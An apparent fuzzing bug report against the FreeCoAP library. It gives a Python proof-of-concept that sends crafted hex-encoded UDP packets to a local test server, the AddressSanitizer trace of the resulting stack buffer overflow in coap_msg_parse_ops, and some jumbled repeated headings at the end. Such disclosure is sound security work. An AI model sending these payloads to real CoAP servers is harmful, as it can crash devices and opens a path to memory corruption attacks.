The CoAP server was started using the test_coap_server executable:
cd FreeCoAP/test/test_coap_server
./test_coap_server 12436
Sending the Packet
import socket
def send_hexstream_to_server(hexstream, server_ip, server_port):
# Convert hexstream to bytes
data = bytes.fromhex(hexstream)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# Send data to the server
sock.sendto(data, (server_ip, server_port))
print(f"Sent hexstream to {server_ip}:{server_port}")
except Exception as e:
print(f"Failed to send hexstream: {e}")
finally:
sock.close()
# Define the server IP and port
server_ip = "127.0.0.1"
server_port = 12436
# Define the hexstreams
hexstreams = [ "4401c1ba7d7447a7b7726567756c61722d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d3839363637", "35612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d383936363735612d2d2d383936363734612d2d383936363735612d2d3138343436373434303733373039353531363137612d2d383936363735612d2d383936363735612d2d31612d2d383936363735612d2d383936363735612d2d38393636373561"
]
for hexstream in hexstreams:
send_hexstream_to_server(hexstream, server_ip, server_port)
Description
AddressSanitizer has detected a stack buffer overflow issue within the coap_msg_parse_ops function, specifically at line 643 in coap_msg.c.
Here is the ASan report:
=================================================================
==29287==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8435c640 at pc 0x4d136e bp 0x7ffc8435b7d0 sp 0x7ffc8435b7c8
READ of size 1 at 0x7ffc8435c640 thread T0
#0 0x4d136d in coap_msg_parse_ops /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:643
#1 0x4ce19a in coap_msg_parse /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:744
#2 0x4b1668 in coap_server_trans_recv /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:1089
#3 0x4a670e in coap_server_exchange /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:2285
#4 0x4a2368 in coap_server_run /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:2559
#5 0x47d938 in main /home/fuzz/target_program/FreeCoAP/test/test_coap_server/test_coap_server.c:683
#6 0x7f66c5305554 in __libc_start_main (/lib64/libc.so.6+0x22554)
#7 0x47cffc in _start (/home/fuzz/target_program/FreeCoAP/test/test_coap_server/test_coap_server+0x47cffc)
Address 0x7ffc8435c640 is located in stack of thread T0 at offset 1696 in frame
#0 0x4b04bf in coap_server_trans_recv /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_server.c:1027
This frame has 9 object(s):
[32, 40) ''
[96, 104) ''
[160, 168) ''
[224, 240) 'client_sin'
[288, 296) 'server'
[352, 356) 'client_sin_len'
[416, 424) 'num'
[480, 488) 'ret'
[544, 1696) 'buf' <== Memory access at offset 1696 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/target_program/FreeCoAP/test/test_coap_server/../../lib/src/coap_msg.c:643 coap_msg_parse_ops
Shadow bytes around the buggy address:
0x100010863870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100010863880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100010863890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000108638a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000108638b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000108638c0: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 00 00
0x1000108638d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000108638e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000108638f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100010863900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100010863910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==29287==ABORTING
Reproduce Info
Build
Build Environment Update
The
Makefile
within thetest_coap_server
directory has been updated to utilizeclang
with sanitizers.Building test_coap_server
Attack
Starting the CoAP Server
The CoAP server was started using the
test_coap_server
executable:Sending the Packet
Description
AddressSanitizer has detected a stack buffer overflow issue within the coap_msg_parse_ops function, specifically at line 643 in coap_msg.c.
Here is the ASan report: